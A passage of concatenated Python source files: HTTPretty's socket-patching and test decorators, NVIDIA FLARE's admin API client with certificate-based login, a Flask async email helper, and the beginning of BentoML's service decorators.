When ``allow_net_connect`` is ``False`` any connection to an unregistered uri will throw :py:class:`httpretty.errors.UnmockedError`.
.. testcode::
import re, json
import httpretty
httpretty.enable()
httpretty.register_uri(
httpretty.GET,
re.compile(r'http://.*'),
body=json.dumps({'man': 'in', 'the': 'middle'})
)
response = requests.get('https://foo.bar/foo/bar')
response.json().should.equal({
"man": "in",
"the": "middle",
})
.. warning:: after calling this method the original :py:mod:`socket` is replaced with :py:class:`httpretty.core.fakesock`. Make sure to call :py:meth:`~httpretty.disable` after done with your tests or use the :py:class:`httpretty.enabled` as decorator or `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.allow_net_connect = allow_net_connect
apply_patch_socket()
cls._is_enabled = True
def apply_patch_socket():
# Some versions of python internally shadowed the
# SocketType variable incorrectly https://bugs.python.org/issue20386
bad_socket_shadow = (socket.socket != socket.SocketType)
new_wrap = None
socket.socket = fakesock.socket
socket._socketobject = fakesock.socket
if not bad_socket_shadow:
socket.SocketType = fakesock.socket
socket.create_connection = create_fake_connection
socket.gethostname = fake_gethostname
socket.gethostbyname = fake_gethostbyname
socket.getaddrinfo = fake_getaddrinfo
socket.__dict__['socket'] = fakesock.socket
socket.__dict__['_socketobject'] = fakesock.socket
if not bad_socket_shadow:
socket.__dict__['SocketType'] = fakesock.socket
socket.__dict__['create_connection'] = create_fake_connection
socket.__dict__['gethostname'] = fake_gethostname
socket.__dict__['gethostbyname'] = fake_gethostbyname
socket.__dict__['getaddrinfo'] = fake_getaddrinfo
if pyopenssl_override:
# Take out the pyopenssl version - use the default implementation
extract_from_urllib3()
if requests_urllib3_connection is not None:
urllib3_wrap = partial(fake_wrap_socket, old_requests_ssl_wrap_socket)
requests_urllib3_connection.ssl_wrap_socket = urllib3_wrap
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = urllib3_wrap
if eventlet:
eventlet.green.ssl.GreenSSLContext = old_sslcontext_class
eventlet.green.ssl.__dict__['GreenSSLContext'] = old_sslcontext_class
eventlet.green.ssl.SSLContext = old_sslcontext_class
eventlet.green.ssl.__dict__['SSLContext'] = old_sslcontext_class
if socks:
socks.socksocket = fakesock.socket
socks.__dict__['socksocket'] = fakesock.socket
if ssl:
new_wrap = partial(fake_wrap_socket, old_ssl_wrap_socket)
ssl.wrap_socket = new_wrap
ssl.SSLSocket = FakeSSLSocket
ssl.SSLContext = old_sslcontext_class
try:
ssl.SSLContext.wrap_socket = partial(fake_wrap_socket, old_ssl_wrap_socket)
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = new_wrap
ssl.__dict__['SSLSocket'] = FakeSSLSocket
ssl.__dict__['SSLContext'] = old_sslcontext_class
def undo_patch_socket():
socket.socket = old_socket
socket.SocketType = old_SocketType
socket._socketobject = old_socket
socket.create_connection = old_create_connection
socket.gethostname = old_gethostname
socket.gethostbyname = old_gethostbyname
socket.getaddrinfo = old_getaddrinfo
socket.__dict__['socket'] = old_socket
socket.__dict__['_socketobject'] = old_socket
socket.__dict__['SocketType'] = old_SocketType
socket.__dict__['create_connection'] = old_create_connection
socket.__dict__['gethostname'] = old_gethostname
socket.__dict__['gethostbyname'] = old_gethostbyname
socket.__dict__['getaddrinfo'] = old_getaddrinfo
if socks:
socks.socksocket = old_socksocket
socks.__dict__['socksocket'] = old_socksocket
if ssl:
ssl.wrap_socket = old_ssl_wrap_socket
ssl.SSLSocket = old_sslsocket
try:
ssl.SSLContext.wrap_socket = old_sslcontext_wrap_socket
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = old_ssl_wrap_socket
ssl.__dict__['SSLSocket'] = old_sslsocket
if requests_urllib3_connection is not None:
requests_urllib3_connection.ssl_wrap_socket = \
old_requests_ssl_wrap_socket
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = \
old_requests_ssl_wrap_socket
if pyopenssl_override:
# Put the pyopenssl version back in place
inject_into_urllib3()
@contextlib.contextmanager
def restored_libs():
undo_patch_socket()
yield
apply_patch_socket()
class httprettized(object):
"""`context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_ for enabling HTTPretty.
.. tip:: Also available under the alias :py:func:`httpretty.enabled`
.. testcode::
import json
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body=json.dumps({'origin': '42.42.42.42'}))
with httpretty.enabled():
response = requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
assert response.json() == {'origin': '42.42.42.42'}
"""
def __init__(self, allow_net_connect=True):
self.allow_net_connect = allow_net_connect
def __enter__(self):
httpretty.reset()
httpretty.enable(allow_net_connect=self.allow_net_connect)
def __exit__(self, exc_type, exc_value, db):
httpretty.disable()
httpretty.reset()
def httprettified(test=None, allow_net_connect=True):
"""decorator for test functions
.. tip:: Also available under the alias :py:func:`httpretty.activate`
:param test: a callable
example usage with `nosetests <https://nose.readthedocs.io/en/latest/>`_
.. testcode::
import sure
from httpretty import httprettified
@httprettified
def test_using_nosetests():
httpretty.register_uri(
httpretty.GET,
'https://httpbin.org/ip'
)
response = requests.get('https://httpbin.org/ip')
response.json().should.equal({
"message": "HTTPretty :)"
})
example usage with `unittest module <https://docs.python.org/3/library/unittest.html>`_
.. testcode::
import unittest
from sure import expect
from httpretty import httprettified
@httprettified
class TestWithPyUnit(unittest.TestCase):
def test_httpbin(self):
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip')
response = requests.get('https://httpbin.org/ip')
expect(response.json()).to.equal({
"message": "HTTPretty :)"
})
"""
def decorate_unittest_TestCase_setUp(klass):
# Prefer addCleanup (added in python 2.7), but fall back
# to using tearDown if it isn't available
use_addCleanup = hasattr(klass, 'addCleanup')
original_setUp = (klass.setUp
if hasattr(klass, 'setUp')
else None)
def new_setUp(self):
httpretty.reset()
httpretty.enable(allow_net_connect)
if use_addCleanup:
self.addCleanup(httpretty.disable)
if original_setUp:
original_setUp(self)
klass.setUp = new_setUp
if not use_addCleanup:
original_tearDown = (klass.setUp
if hasattr(klass, 'tearDown')
else None)
def new_tearDown(self):
httpretty.disable()
httpretty.reset()
if original_tearDown:
original_tearDown(self)
klass.tearDown = new_tearDown
return klass
def decorate_test_methods(klass):
for attr in dir(klass):
if not attr.startswith('test_'):
continue
attr_value = getattr(klass, attr)
if not hasattr(attr_value, "__call__"):
continue
setattr(klass, attr, decorate_callable(attr_value))
return klass
def is_unittest_TestCase(klass):
try:
import unittest
return issubclass(klass, unittest.TestCase)
except ImportError:
return False
"A decorator for tests that use HTTPretty"
def decorate_class(klass):
if is_unittest_TestCase(klass):
return decorate_unittest_TestCase_setUp(klass)
return decorate_test_methods(klass)
def decorate_callable(test):
@functools.wraps(test)
def wrapper(*args, **kw):
with httprettized(allow_net_connect):
return test(*args, **kw)
return wrapper
if isinstance(test, type):
return decorate_class(test)
elif callable(test):
return decorate_callable(test)
return decorate_callable
|
api.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import socket
import ssl
import threading
import time
import traceback
from datetime import datetime
from typing import List, Optional
from nvflare.apis.overseer_spec import SP, OverseerAgent
from nvflare.fuel.hci.cmd_arg_utils import split_to_args
from nvflare.fuel.hci.conn import Connection, receive_and_process
from nvflare.fuel.hci.proto import make_error
from nvflare.fuel.hci.reg import CommandModule, CommandRegister
from nvflare.fuel.hci.security import get_certificate_common_name
from nvflare.fuel.hci.table import Table
from nvflare.ha.ha_admin_cmds import HACommandModule
from .api_spec import AdminAPISpec, ReplyProcessor
from .api_status import APIStatus
class _DefaultReplyProcessor(ReplyProcessor):
def process_shutdown(self, api: AdminAPI, msg: str):
api.shutdown_received = True
api.shutdown_msg = msg
class _LoginReplyProcessor(ReplyProcessor):
"""Reply processor for handling login and setting the token for the admin client."""
def process_string(self, api: AdminAPI, item: str):
api.login_result = item
def process_token(self, api: AdminAPI, token: str):
api.token = token
class _CmdListReplyProcessor(ReplyProcessor):
"""Reply processor to register available commands after getting back a table of commands from the server."""
def process_table(self, api: AdminAPI, table: Table):
for i in range(len(table.rows)):
if i == 0:
# this is header
continue
row = table.rows[i]
if len(row) < 5:
return
scope = row[0]
cmd_name = row[1]
desc = row[2]
usage = row[3]
confirm = row[4]
# if confirm == 'auth' and not client.require_login:
# the user is not authenticated - skip this command
# continue
api.server_cmd_reg.add_command(
scope_name=scope,
cmd_name=cmd_name,
desc=desc,
usage=usage,
handler=None,
authz_func=None,
visible=True,
confirm=confirm,
)
api.server_cmd_received = True
class AdminAPI(AdminAPISpec):
def __init__(
self,
host=None,
port=None,
ca_cert: str = "",
client_cert: str = "",
client_key: str = "",
upload_dir: str = "",
download_dir: str = "",
server_cn=None,
cmd_modules: Optional[List] = None,
overseer_agent: OverseerAgent = None,
auto_login: bool = False,
user_name: str = None,
poc: bool = False,
debug: bool = False,
):
"""Underlying API to keep certs, keys and connection information and to execute admin commands through do_command.
Args:
host: cn provisioned for the server, with this fully qualified domain name resolving to the IP of the FL server. This may be set by the OverseerAgent.
port: port provisioned as admin_port for FL admin communication, by default provisioned as 8003, must be int if provided. This may be set by the OverseerAgent.
ca_cert: path to CA Cert file, by default provisioned rootCA.pem
client_cert: path to admin client Cert file, by default provisioned as client.crt
client_key: path to admin client Key file, by default provisioned as client.key
upload_dir: File transfer upload directory. Folders uploaded to the server to be deployed must be here. Folder must already exist and be accessible.
download_dir: File transfer download directory. Can be same as upload_dir. Folder must already exist and be accessible.
server_cn: server cn (only used for validating server cn)
cmd_modules: command modules to load and register. Note that FileTransferModule is initialized here with upload_dir and download_dir if cmd_modules is None.
overseer_agent: initialized OverseerAgent to obtain the primary service provider to set the host and port of the active server
auto_login: Whether to use stored credentials to automatically log in (required to be True with OverseerAgent to provide high availability)
user_name: Username to authenticate with FL server
poc: Whether to enable poc mode for using the proof of concept example without secure communication.
debug: Whether to print debug messages, which can help with diagnosing problems. False by default.
"""
super().__init__()
if cmd_modules is None:
from .file_transfer import FileTransferModule
cmd_modules = [FileTransferModule(upload_dir=upload_dir, download_dir=download_dir)]
elif not isinstance(cmd_modules, list):
raise TypeError("cmd_modules must be a list, but got {}".format(type(cmd_modules)))
else:
for m in cmd_modules:
if not isinstance(m, CommandModule):
raise TypeError(
"cmd_modules must be a list of CommandModule, but got element of type {}".format(type(m))
)
cmd_modules.append(HACommandModule())
self.overseer_agent = overseer_agent
self.host = host
self.port = port
self.poc = poc
if self.poc:
self.poc_key = "admin"
else:
if len(ca_cert) <= 0:
raise Exception("missing CA Cert file name")
self.ca_cert = ca_cert
if len(client_cert) <= 0:
raise Exception("missing Client Cert file name")
self.client_cert = client_cert
if len(client_key) <= 0:
raise Exception("missing Client Key file name")
self.client_key = client_key
if not isinstance(self.overseer_agent, OverseerAgent):
raise Exception("overseer_agent is missing but must be provided for secure context.")
self.overseer_agent.set_secure_context(
ca_path=self.ca_cert, cert_path=self.client_cert, prv_key_path=self.client_key
)
if self.overseer_agent:
self.overseer_agent.start(self._overseer_callback)
self.server_cn = server_cn
self.debug = debug
# for overseer agent
self.ssid = None
# for login
self.token = None
self.login_result = None
if auto_login:
self.auto_login = True
if not user_name:
raise Exception("for auto_login, user_name is required.")
self.user_name = user_name
self.server_cmd_reg = CommandRegister(app_ctx=self)
self.client_cmd_reg = CommandRegister(app_ctx=self)
self.server_cmd_received = False
self.all_cmds = []
self._load_client_cmds(cmd_modules)
# for shutdown
self.shutdown_received = False
self.shutdown_msg = None
self.server_sess_active = False
self.sess_monitor_thread = None
self.sess_monitor_active = False
def _overseer_callback(self, overseer_agent):
sp = overseer_agent.get_primary_sp()
self._set_primary_sp(sp)
def _set_primary_sp(self, sp: SP):
if sp and sp.primary is True:
if self.host != sp.name or self.port != int(sp.admin_port) or self.ssid != sp.service_session_id:
# if needing to log out of previous server, this may be where to issue server_execute("_logout")
self.host = sp.name
self.port = int(sp.admin_port)
self.ssid = sp.service_session_id
print(
f"Got primary SP {self.host}:{sp.fl_port}:{self.port} from overseer. Host: {self.host} Admin_port: {self.port} SSID: {self.ssid}"
)
thread = threading.Thread(target=self._login_sp)
thread.start()
def _login_sp(self):
if not self._auto_login():
print("cannot log in, shutting down...")
self.shutdown_received = True
def _auto_login(self):
try_count = 0
while try_count < 5:
if self.poc:
self.login_with_poc(username=self.user_name, poc_key=self.poc_key)
print(f"login_result: {self.login_result} token: {self.token}")
if self.login_result == "OK":
return True
elif self.login_result == "REJECT":
print("Incorrect key for POC mode.")
return False
else:
print("Communication Error - please try later")
try_count += 1
else:
self.login(username=self.user_name)
if self.login_result == "OK":
return True
elif self.login_result == "REJECT":
print("Incorrect user name or certificate.")
return False
else:
print("Communication Error - please try later")
try_count += 1
time.sleep(1.0)
return False
def _load_client_cmds(self, cmd_modules):
if cmd_modules:
for m in cmd_modules:
self.client_cmd_reg.register_module(m, include_invisible=False)
self.client_cmd_reg.finalize(self.register_command)
def register_command(self, cmd_entry):
self.all_cmds.append(cmd_entry.name)
def start_session_monitor(self, session_ended_callback, interval=5):
if self.sess_monitor_thread and self.sess_monitor_thread.is_alive():
self.close_session_monitor()
self.sess_monitor_thread = threading.Thread(
target=self._check_session, args=(session_ended_callback, interval), daemon=True
)
self.sess_monitor_active = True
self.sess_monitor_thread.start()
def close_session_monitor(self):
self.sess_monitor_active = False
if self.sess_monitor_thread and self.sess_monitor_thread.is_alive():
self.sess_monitor_thread.join()
self.sess_monitor_thread = None
def _check_session(self, session_ended_callback, interval):
error_msg = ""
connection_error_counter = 0
while True:
time.sleep(interval)
if not self.sess_monitor_active:
return
if self.shutdown_received:
error_msg = self.shutdown_msg
break
resp = self.server_execute("_check_session")
status = resp["status"]
connection_error_counter += 1
if status != APIStatus.ERROR_SERVER_CONNECTION:
connection_error_counter = 0
if status in APIStatus.ERROR_INACTIVE_SESSION or (
status in APIStatus.ERROR_SERVER_CONNECTION and connection_error_counter > 60 // interval
):
for item in resp["data"]:
if item["type"] == "error":
error_msg = item["data"]
break
self.server_sess_active = False
session_ended_callback(error_msg)
def logout(self):
"""Send logout command to server."""
resp = self.server_execute("_logout")
self.server_sess_active = False
return resp
def login(self, username: str):
"""Login using certification files and retrieve server side commands.
Args:
username: Username
Returns:
A dict of status and details
"""
self.login_result = None
self._try_command(f"_cert_login {username}", _LoginReplyProcessor())
if self.login_result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
elif self.login_result == "REJECT":
return {"status": APIStatus.ERROR_CERT, "details": "Incorrect user name or certificate"}
# get command list from server
self.server_cmd_received = False
self._try_command("_commands", _CmdListReplyProcessor())
self.server_cmd_reg.finalize(self.register_command)
if not self.server_cmd_received:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
self.server_sess_active = True
return {"status": APIStatus.SUCCESS, "details": "Login success"}
def login_with_poc(self, username: str, poc_key: str):
"""Login using key for proof of concept example.
Args:
username: Username
poc_key: key used for proof of concept admin login
Returns:
A dict of login status and details
"""
self.login_result = None
self._try_command(f"_login {username} {poc_key}", _LoginReplyProcessor())
if self.login_result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
elif self.login_result == "REJECT":
return {"status": APIStatus.ERROR_CERT, "details": "Incorrect user name or certificate"}
# get command list from server
self.server_cmd_received = False
self._try_command("_commands", _CmdListReplyProcessor())
self.server_cmd_reg.finalize(self.register_command)
if not self.server_cmd_received:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
self.server_sess_active = True
return {"status": APIStatus.SUCCESS, "details": "Login success"}
def _send_to_sock(self, sock, command, process_json_func):
conn = Connection(sock, self)
conn.append_command(command)
if self.token:
conn.append_token(self.token)
conn.close()
ok = receive_and_process(sock, process_json_func)
if not ok:
process_json_func(
make_error("Failed to communicate with Admin Server {} on {}".format(self.host, self.port))
)
def _process_server_reply(self, resp):
"""Process the server reply and store the status/details into API's `command_result`
Args:
resp: The raw response that returns by the server.
"""
if self.debug:
print("DEBUG: Server Reply: {}".format(resp))
# this resp is what is usually directly used to return, straight from server
self.set_command_result(resp)
reply_processor = _DefaultReplyProcessor() if self.reply_processor is None else self.reply_processor
reply_processor.reply_start(self, resp)
if resp is not None:
data = resp["data"]
for item in data:
it = item["type"]
if it == "string":
reply_processor.process_string(self, item["data"])
elif it == "success":
reply_processor.process_success(self, item["data"])
elif it == "error":
reply_processor.process_error(self, item["data"])
break
elif it == "table":
table = Table(None)
table.set_rows(item["rows"])
reply_processor.process_table(self, table)
elif it == "dict":
reply_processor.process_dict(self, item["data"])
elif it == "token":
reply_processor.process_token(self, item["data"])
elif it == "shutdown":
reply_processor.process_shutdown(self, item["data"])
break
else:
reply_processor.protocol_error(self, "Invalid item type: " + it)
break
else:
reply_processor.protocol_error(self, "Protocol Error")
reply_processor.reply_done(self)
def _try_command(self, command, reply_processor):
"""Try to execute a command on server side.
Args:
command: The command to execute.
reply_processor: An instance of ReplyProcessor
"""
# process_json_func can't return data because how "receive_and_process" is written.
self.reply_processor = reply_processor
process_json_func = self._process_server_reply
try:
if not self.poc:
# SSL communication
ctx = ssl.create_default_context()
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = False
ctx.load_verify_locations(self.ca_cert)
ctx.load_cert_chain(certfile=self.client_cert, keyfile=self.client_key)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
with ctx.wrap_socket(sock) as ssock:
ssock.connect((self.host, self.port))
if self.server_cn:
# validate server CN
cn = get_certificate_common_name(ssock.getpeercert())
if cn != self.server_cn:
process_json_func(
make_error("wrong server: expecting {} but connected {}".format(self.server_cn, cn))
)
return
self._send_to_sock(ssock, command, process_json_func)
else:
# poc without certs
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((self.host, self.port))
self._send_to_sock(sock, command, process_json_func)
except Exception as ex:
if self.debug:
traceback.print_exc()
process_json_func(
make_error("Failed to communicate with Admin Server {} on {}: {}".format(self.host, self.port, ex))
)
def do_command(self, command):
"""A convenient method to call commands using string.
Args:
command (str): command
Returns:
Object containing status and details (or direct response from server, which originally was just time and data)
"""
args = split_to_args(command)
cmd_name = args[0]
self.set_command_result(None)
# check client side commands
entries = self.client_cmd_reg.get_command_entries(cmd_name)
if len(entries) > 1:
return {
"status": APIStatus.ERROR_SYNTAX,
"details": f"Ambiguous client command {cmd_name} - qualify with scope",
}
elif len(entries) == 1:
self.set_command_result(None)
ent = entries[0]
return_result = ent.handler(args, self)
result = self.get_command_result()
if return_result:
return return_result
if result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Client did not respond"}
return result
# check server side commands
entries = self.server_cmd_reg.get_command_entries(cmd_name)
if len(entries) <= 0:
return {
"status": APIStatus.ERROR_SYNTAX,
"details": f"Command {cmd_name} not found in server or client cmds",
}
elif len(entries) > 1:
return {
"status": APIStatus.ERROR_SYNTAX,
"details": f"Ambiguous server command {cmd_name} - qualify with scope",
}
return self.server_execute(command)
def server_execute(self, command, reply_processor=None):
if not self.server_sess_active:
return {"status": APIStatus.ERROR_INACTIVE_SESSION, "details": "API session is inactive"}
self.set_command_result(None)
start = time.time()
self._try_command(command, reply_processor)
secs = time.time() - start
usecs = int(secs * 1000000)
if self.debug:
print(f"DEBUG: server_execute Done [{usecs} usecs] {datetime.now()}")
result = self.get_command_result()
if result is None:
return {"status": APIStatus.ERROR_SERVER_CONNECTION, "details": "Server did not respond"}
if "data" in result:
for item in result["data"]:
if item["type"] == "error":
if "session_inactive" in item["data"]:
result.update({"status": APIStatus.ERROR_INACTIVE_SESSION})
elif any(
err in item["data"] for err in ("Failed to communicate with Admin Server", "wrong server")
):
result.update({"status": APIStatus.ERROR_SERVER_CONNECTION})
if "status" not in result:
result.update({"status": APIStatus.SUCCESS})
self.set_command_result(result)
return result
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, content):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
#msg.body = render_template(template + '.txt', **kwargs)
#msg.html = render_template(template + '.html', **kwargs)
msg.html = content
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from dependency_injector.wiring import Provide, inject
from typing import List
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import (
DEFAULT_MAX_BATCH_SIZE,
DEFAULT_MAX_LATENCY,
SavedBundleConfig,
)
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def validate_inference_api_route(route: str):
if re.findall(
r"[?#]+|^(//)|^:", route
): # contains '?' or '#' OR start with '//' OR start with ':'
# https://tools.ietf.org/html/rfc3986#page-22
raise InvalidArgument(
"The path {} contains illegal url characters".format(route)
)
if route in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API route: '{}' is reserved for infra endpoints".format(route)
)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
route: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
:param api_name: API name, default to the user-defined callback function's function
name
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
:param api_doc: user-facing documentation of the inference API. default to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
web_static_content: path to directory containg index.html and static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = None,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_override_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
pip_packages:: list of pip_packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: path to the requirements.txt where pip dependencies
are explicitly specified, with ideally pinned versions
conda_channels: list of extra conda channels other than default channels to be
used. This is equivalent to passing the --channels to conda commands
conda_override_channels: ensures that conda searches only your specified
channel and no other channels, such as default channels.
This is equivalent to passing the --override-channels option to conda
commands, or adding `nodefaults` to the `channels` in the environment.yml
conda_overwrite_channels: aliases to `override_channels`
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
"""
if requirements_txt_file:
if pip_packages:
logger.warning("Ignoring pip_packages as requirements_txt_file is set.")
if pip_index_url or pip_trusted_host or pip_extra_index_url:
logger.warning(
"Ignoring pip related options as requirements_txt_file is set."
)
if pip_dependencies is not None:
logger.warning(
"`pip_dependencies` parameter in `@env` is being deprecated soon, use "
"`pip_packages` instead, e.g. `@env(pip_packages=[\"numpy\"])`"
)
if auto_pip_dependencies is not None:
logger.warning(
"`auto_pip_dependencies` parameter in `@env` is being deprecated soon,"
"use `infer_pip_packages` instead, e.g. `@env(infer_pip_packages=True)`"
)
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_override_channels=conda_override_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
'Patch' is provided(or auto generated) when calling BentoService#save,
while 'Major' and 'Minor' can be defined with '@ver' decorator
>>> from bentoml import ver, artifacts
